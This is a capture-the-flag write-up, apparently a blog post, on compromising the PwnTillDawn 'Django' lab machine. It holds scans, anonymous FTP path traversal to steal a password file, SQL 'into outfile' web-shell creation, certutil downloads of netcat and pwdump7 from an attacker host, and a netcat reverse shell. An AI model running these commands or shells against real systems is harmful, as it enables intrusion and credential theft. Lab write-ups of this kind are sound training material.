ptd-django-private

1st we start with a nmap scan

E:\PENTEST\NMAP>nmap -vv -A 10.150.150.212
WARNING: Could not import all necessary Npcap functions. You may need to upgrade to the latest version from http://www.npcap.org. Resorting to connect() mode -- Nmap may not function completely
Starting Nmap 7.70 ( https://nmap.org ) at 2020-08-20 13:18 W. Europe Summer Time
NSE: Loaded 148 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 2) scan.
Initiating NSE at 13:18
Completed NSE at 13:18, 0.00s elapsed
NSE: Starting runlevel 2 (of 2) scan.
Initiating NSE at 13:18
Completed NSE at 13:18, 0.00s elapsed
Initiating Ping Scan at 13:18
Scanning 10.150.150.212 [2 ports]
Completed Ping Scan at 13:18, 0.03s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 13:18
Completed Parallel DNS resolution of 1 host. at 13:18, 0.01s elapsed
Initiating Connect Scan at 13:18
Scanning 10.150.150.212 [1000 ports]
Discovered open port 443/tcp on 10.150.150.212
Discovered open port 3306/tcp on 10.150.150.212
Discovered open port 21/tcp on 10.150.150.212
Discovered open port 139/tcp on 10.150.150.212
Discovered open port 80/tcp on 10.150.150.212
Discovered open port 445/tcp on 10.150.150.212
Discovered open port 135/tcp on 10.150.150.212
Discovered open port 49157/tcp on 10.150.150.212
Discovered open port 49152/tcp on 10.150.150.212
Discovered open port 49158/tcp on 10.150.150.212
Discovered open port 49154/tcp on 10.150.150.212
Discovered open port 8089/tcp on 10.150.150.212
Discovered open port 49153/tcp on 10.150.150.212
Discovered open port 49155/tcp on 10.150.150.212
Completed Connect Scan at 13:19, 44.10s elapsed (1000 total ports)
Initiating Service scan at 13:19
Scanning 14 services on 10.150.150.212
Service scan Timing: About 64.29% done; ETC: 13:20 (0:00:30 remaining)
Completed Service scan at 13:20, 59.02s elapsed (14 services on 1 host)
NSE: Script scanning 10.150.150.212.
NSE: Starting runlevel 1 (of 2) scan.
Initiating NSE at 13:20
NSE Timing: About 99.95% done; ETC: 13:20 (0:00:00 remaining)
Completed NSE at 13:20, 38.83s elapsed
NSE: Starting runlevel 2 (of 2) scan.
Initiating NSE at 13:20
Completed NSE at 13:20, 0.00s elapsed
Nmap scan report for 10.150.150.212
Host is up, received syn-ack (0.032s latency).
Scanned at 2020-08-20 13:18:29 W. Europe Summer Time for 144s
Not shown: 986 filtered ports
Reason: 986 no-responses
PORT STATE SERVICE REASON VERSION
21/tcp open ftp syn-ack
| fingerprint-strings:
| GenericLines:
| 220-Wellcome to Home Ftp Server!
| Server ready.
| command not understood.
| command not understood.
| Help:
| 220-Wellcome to Home Ftp Server!
| Server ready.
| 'HELP': command not understood.
| NULL, SMBProgNeg:
| 220-Wellcome to Home Ftp Server!
| Server ready.
| SSLSessionReq:
| 220-Wellcome to Home Ftp Server!
| Server ready.
|_ command not understood.
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| drw-rw-rw- 1 ftp ftp 0 Mar 26 2019 . [NSE: writeable]
| drw-rw-rw- 1 ftp ftp 0 Mar 26 2019 .. [NSE: writeable]
| drw-rw-rw- 1 ftp ftp 0 Mar 13 2019 FLAG [NSE: writeable]
| -rw-rw-rw- 1 ftp ftp 34419 Mar 26 2019 xampp-control.log [NSE: writeable]
|_-rw-rw-rw- 1 ftp ftp 881 Nov 13 2018 zen.txt [NSE: writeable]
| ftp-syst:
|_ SYST: Internet Component Suite
80/tcp open http syn-ack Apache httpd 2.4.34 ((Win32) OpenSSL/1.0.2o PHP/5.6.38)
|_http-favicon: Unknown favicon MD5: 56F7C04657931F2D0B79371B2D6E9820
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.34 (Win32) OpenSSL/1.0.2o PHP/5.6.38
| http-title: Welcome to XAMPP
|_Requested resource was http://10.150.150.212/dashboard/
135/tcp open msrpc syn-ack Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack Microsoft Windows netbios-ssn
443/tcp open ssl/http syn-ack Apache httpd 2.4.34 ((Win32) OpenSSL/1.0.2o PHP/5.6.38)
|_http-favicon: Unknown favicon MD5: 6EB4A43CB64C97F76562AF703893C8FD
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.34 (Win32) OpenSSL/1.0.2o PHP/5.6.38
| http-title: Welcome to XAMPP
|_Requested resource was https://10.150.150.212/dashboard/
| ssl-cert: Subject: commonName=localhost
| Issuer: commonName=localhost
| Public Key type: rsa
| Public Key bits: 1024
| Signature Algorithm: sha1WithRSAEncryption
| Not valid before: 2009-11-10T23:48:47
| Not valid after: 2019-11-08T23:48:47
| MD5: a0a4 4cc9 9e84 b26f 9e63 9f9e d229 dee0
| SHA-1: b023 8c54 7a90 5bfa 119c 4e8b acca eacf 3649 1ff6
| -----BEGIN CERTIFICATE-----
| MIIBnzCCAQgCCQC1x1LJh4G1AzANBgkqhkiG9w0BAQUFADAUMRIwEAYDVQQDEwls
| b2NhbGhvc3QwHhcNMDkxMTEwMjM0ODQ3WhcNMTkxMTA4MjM0ODQ3WjAUMRIwEAYD
| VQQDEwlsb2NhbGhvc3QwgZ8wDQYJKoZIhvcNAQEBBQADgY0AMIGJAoGBAMEl0yfj
| 7K0Ng2pt51+adRAj4pCdoGOVjx1BmljVnGOMW3OGkHnMw9ajibh1vB6UfHxu463o
| J1wLxgxq+Q8y/rPEehAjBCspKNSq+bMvZhD4p8HNYMRrKFfjZzv3ns1IItw46kgT
| gDpAl1cMRzVGPXFimu5TnWMOZ3ooyaQ0/xntAgMBAAEwDQYJKoZIhvcNAQEFBQAD
| gYEAavHzSWz5umhfb/MnBMa5DL2VNzS+9whmmpsDGEG+uR0kM1W2GQIdVHHJTyFd
| aHXzgVJBQcWTwhp84nvHSiQTDBSaT6cQNQpvag/TaED/SEQpm0VqDFwpfFYuufBL
| vVNbLkKxbK2XwUvu0RxoLdBMC/89HqrZ0ppiONuQ+X2MtxE=
|_-----END CERTIFICATE-----
|_ssl-date: TLS randomness does not represent time
| tls-alpn:
| http/1.1
|_ http/1.1
445/tcp open microsoft-ds syn-ack Windows 7 Home Basic 7601 Service Pack 1 microsoft-ds (workgroup: PWNTILLDAWN)
3306/tcp open mysql syn-ack MariaDB (unauthorized)
8089/tcp open ssl/http syn-ack Splunkd httpd
| http-methods:
|_ Supported Methods: GET HEAD OPTIONS
| http-robots.txt: 1 disallowed entry
|_/
|_http-server-header: Splunkd
|_http-title: splunkd
| ssl-cert: Subject: commonName=SplunkServerDefaultCert/organizationName=SplunkUser
| Issuer: commonName=SplunkCommonCA/organizationName=Splunk/stateOrProvinceName=CA/countryName=US/emailAddress=support@splunk.com/localityName=San Francisco
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2019-10-29T14:31:26
| Not valid after: 2022-10-28T14:31:26
| MD5: 5d60 c8e6 37f3 eea2 1ca0 3cd3 bbae 8193
| SHA-1: 0c85 65c6 0e58 49e7 1882 b403 40f4 b521 6360 8ba9
| -----BEGIN CERTIFICATE-----
| MIIDMjCCAhoCCQDsGSJfSRwcdzANBgkqhkiG9w0BAQsFADB/MQswCQYDVQQGEwJV
| UzELMAkGA1UECAwCQ0ExFjAUBgNVBAcMDVNhbiBGcmFuY2lzY28xDzANBgNVBAoM
| BlNwbHVuazEXMBUGA1UEAwwOU3BsdW5rQ29tbW9uQ0ExITAfBgkqhkiG9w0BCQEW
| EnN1cHBvcnRAc3BsdW5rLmNvbTAeFw0xOTEwMjkxNDMxMjZaFw0yMjEwMjgxNDMx
| MjZaMDcxIDAeBgNVBAMMF1NwbHVua1NlcnZlckRlZmF1bHRDZXJ0MRMwEQYDVQQK
| DApTcGx1bmtVc2VyMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwA4l
| dCLRsUH/gqdstF7FgaM1VmhZb0ijlpG1sbpT8nG+OcPpI/LmQzMI73MceLrr3iGK
| TKBmT/7HiyLjVAUOC+sRxTr0NSUOESpmEm3HA60rV7xzCiGQIJcNoVWvR7gIF5gU
| 8G/Oqv2WBSJKVSg3z9up1FFYGF8VnEBUe/PyqGc0+mf0PC+vidx1V02PzeGfgG5o
| dnwCD0uaQ7yzH0GT9z59N8fYfXMcVM7pbdhUIATgF0tIkl9UgwF5RSsG4wMRmzqH
| /z+vjkn+hJdWydu33pD2J2st4a+v0vEDHqJYZkSXG7BqqMjsGpcjKnRsBen/JHxv
| FWlo45YUTNlqtP/+fwIDAQABMA0GCSqGSIb3DQEBCwUAA4IBAQA6nFTapGzsDIHj
| E38SOLEvQ5CWDWn+r1acCOTJ2U6gUzkymRhFfEZ9Sra8JK2F2a1IWcLrdbf495NN
| mwpwSU1D17DchCOIRxLFm8kq3imqLX0i/zgE3C+bsbl0MbgsTZsuZIRNEBSicfx6
| ZQPIuXl8HhFiJxGxK6/cQHs0R/GsaHCiB96QEyzRZzl9OieHwAI+JdAu/QDep7Av
| Z4bnpn9zJQhWIqAx6Zf7a2hLZbtNFqaFOH3sdlkI1r4vDunvIOfXXts2qq9PmitD
| C0xrGPL0+gkiEIdN5+6csG2RSnfwXO3K+ZA1ABXuLshoNVNoKve6kSCwzRBwUefX
| HkRDQlSM
|_-----END CERTIFICATE-----
49152/tcp open msrpc syn-ack Microsoft Windows RPC
49153/tcp open msrpc syn-ack Microsoft Windows RPC
49154/tcp open msrpc syn-ack Microsoft Windows RPC
49155/tcp open msrpc syn-ack Microsoft Windows RPC
49157/tcp open msrpc syn-ack Microsoft Windows RPC
49158/tcp open msrpc syn-ack Microsoft Windows RPC
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port21-TCP:V=7.70%I=7%D=8/20%Time=5F3E5C39%P=i686-pc-windows-windows%r(
SF:NULL,35,"220-Wellcome\x20to\x20Home\x20Ftp\x20Server!\r\n220\x20Server\
SF:x20ready\.\r\n")%r(GenericLines,79,"220-Wellcome\x20to\x20Home\x20Ftp\x
SF:20Server!\r\n220\x20Server\x20ready\.\r\n500\x20'\r':\x20command\x20not
SF:\x20understood\.\r\n500\x20'\r':\x20command\x20not\x20understood\.\r\n"
SF:)%r(Help,5A,"220-Wellcome\x20to\x20Home\x20Ftp\x20Server!\r\n220\x20Ser
SF:ver\x20ready\.\r\n500\x20'HELP':\x20command\x20not\x20understood\.\r\n"
SF:)%r(SSLSessionReq,89,"220-Wellcome\x20to\x20Home\x20Ftp\x20Server!\r\n2
SF:20\x20Server\x20ready\.\r\n500\x20'\x16\x03\0\0S\x01\0\0O\x03\0\?G\xd7\
SF:xf7\xba,\xee\xea\xb2`~\xf3\0\xfd\x82{\xb9\xd5\x96\xc8w\x9b\xe6\xc4\xdb<
SF:=\xdbo\xef\x10n\0\0\(\0\x16\0\x13\0':\x20command\x20not\x20understood\.
SF:\r\n")%r(SMBProgNeg,35,"220-Wellcome\x20to\x20Home\x20Ftp\x20Server!\r\
SF:n220\x20Server\x20ready\.\r\n");
Service Info: Hosts: Wellcome, DJANGO; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 56m57s, deviation: 1s, median: 56m56s
| p2p-conficker:
| Checking for Conficker.C or higher...
| Check 1 (port 18317/tcp): CLEAN (Timeout)
| Check 2 (port 19575/tcp): CLEAN (Timeout)
| Check 3 (port 8595/udp): CLEAN (Timeout)
| Check 4 (port 51927/udp): CLEAN (Timeout)
|_ 0/4 checks are positive: Host is CLEAN or ports are blocked
| smb-os-discovery:
| OS: Windows 7 Home Basic 7601 Service Pack 1 (Windows 7 Home Basic 6.1)
| OS CPE: cpe:/o:microsoft:windows_7::sp1
| Computer name: Django
| NetBIOS computer name: DJANGO\x00
| Workgroup: PWNTILLDAWN\x00
|_ System time: 2020-08-20T12:17:14+00:00
| smb-security-mode:
| account_used: <blank>
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2020-08-20 14:17:18
|_ start_date: 2020-04-02 16:41:43

NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 2) scan.
Initiating NSE at 13:20
Completed NSE at 13:20, 0.00s elapsed
NSE: Starting runlevel 2 (of 2) scan.
Initiating NSE at 13:20
Completed NSE at 13:20, 0.00s elapsed
Read data files from: E:\PENTEST\NMAP
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 147.40 seconds

E:\PENTEST\NMAP>

.

kali@kali:~/ptd$ gobuster dir -k --wordlist /usr/share/wordlists/dirb/big.txt --url https://10.150.150.212
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url: https://10.150.150.212
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirb/big.txt
[+] Status codes: 200,204,301,302,307,401,403
[+] User Agent: gobuster/3.0.1
[+] Timeout: 10s
===============================================================
2020/08/20 07:38:08 Starting gobuster
===============================================================
/.htaccess (Status: 403)
/.htpasswd (Status: 403)
/aux (Status: 403)
/cgi-bin/ (Status: 403)
/com1 (Status: 403)
/com2 (Status: 403)
/com3 (Status: 403)
/com4 (Status: 403)
/con (Status: 403)
/dashboard (Status: 301)
/favicon.ico (Status: 200)
/img (Status: 301)
/licenses (Status: 403)
/lpt1 (Status: 403)
/lpt2 (Status: 403)
/nul (Status: 403)
/phpmyadmin (Status: 301)
/prn (Status: 403)
/secci (Status: 403)
/server-info (Status: 403)
/server-status (Status: 403)
/webalizer (Status: 403)
/xampp (Status: 301)
===============================================================
2020/08/20 07:40:25 Finished
===============================================================
kali@kali:~/ptd$
kali@kali:~/ptd$ mysql -u root -p 10.150.150.212
Enter password:thebarrierbetween
ERROR 2002 (HY000): Can't connect to local MySQL server through socket '/var/run/mysqld/mysqld.sock' (2) -> to test from kali2do
kali@kali:~/ptd$ nmap --script smb-vuln-* 10.150.150.212
Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-20 08:18 EDT

 

E:\PENTEST\PTD>type xampp-control.log | findstr pass
3:11:25 PM [main] XAMPP Password Written in: “c:\xampp\passwords.txt”

E:\PENTEST\PTD>ftp 10.150.150.212
Connected to 10.150.150.212.
220-Wellcome to Home Ftp Server!
220 Server ready.
530 Please login with USER and PASS.
User (10.150.150.212:(none)): anonymous
331 Password required for anonymous.
Password:
230 User Anonymous logged in.
ftp> get ../xampp/passwords.txt
200 Port command successful.
150 Opening data connection for ../xampp/passwords.txt.
226 File sent ok
ftp: 816 bytes received in 0.16Seconds 5.07Kbytes/sec.
ftp> quit
221 Goodbye.

E:\PENTEST\PTD>type passwords.txt
### XAMPP Default Passwords ###

1) MySQL (phpMyAdmin):

User: root
Password:thebarrierbetween

2) FileZilla FTP:

[ You have to create a new user on the FileZilla Interface ]

3) Mercury (not in the USB & lite version):

Postmaster: Postmaster (postmaster@localhost)
Administrator: Admin (admin@localhost)

User: newuser
Password: wampp

4) WEBDAV:

User: xampp-dav-unsecure
Password: ppmax2011
Attention: WEBDAV is not active since XAMPP Version 1.7.4.
For activation please comment out the httpd-dav.conf and
following modules in the httpd.conf

LoadModule dav_module modules/mod_dav.so
LoadModule dav_fs_module modules/mod_dav_fs.so

Please do not forget to refresh the WEBDAV authentification (users and passwords).

E:\PENTEST\PTD>

U don’t need password. From phpmyadmin, use sql command to outfile a reverse shell

in database = flag18_ad1357d394eba91febe5a6d33dd3ec6dd0abc056

mysql> select “<?php eval($_POST[‘puckie’])?>” into outfile’C:/xampp/webshell.php’;
Query OK, 1 row affected (0.00 sec)

SELECT "<?php system($_GET['cmd']); ?>" into outfile "C:\\xampp\\htdocs\\backdoor.php"
http://10.150.150.212/backdoor.php?cmd=whoami
http://10.150.150.212/backdoor.php?cmd=dir%20c:\users\chuck.norris\desktop
flag11 = 7a763d39f68ece1edd1037074ff8d129451af0b1
http://10.150.150.212/backdoor.php?cmd=mkdir /temp
http://10.150.150.212/backdoor.php?cmd=certutil -urlcache -split -f "http://10.66.66.94/nc.exe" c:\\temp\nc.exe

http://10.150.150.212/backdoor.php?cmd=c:\\temp\nc.exe 10.66.66.94 53 -e cmd.exe
E:\PENTEST>nc -nlvp 53
listening on [any] 53 ...
connect to [10.66.66.94] from (UNKNOWN) [10.150.150.212] 49269
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.

C:\xampp\htdocs>whoami
whoami
django\chuck.norris

c:\Users\chuck.norris\Desktop>type flag11.txt
type flag11.txt
7a763d39f68ece1edd1037074ff8d129451af0b1

c:\xampp>type flag20.txt
type flag20.txt
a9435c140b6667cf2f24fcf6a9a1ea6b8574c3e7

certutil -urlcache -split -f “http://10.66.66.94/pwdump7.exe” c:\\temp\pwdump7.exe

Write-ups have been authorized for this machine by the PwnTillDawn Crew! We are just asking you to give us credit by adding a backlink to https://www.wizlynxgroup.com/ and https://online.pwntilldawn.com/ in your write-up.

Posted on

Leave a Reply

Your email address will not be published. Required fields are marked *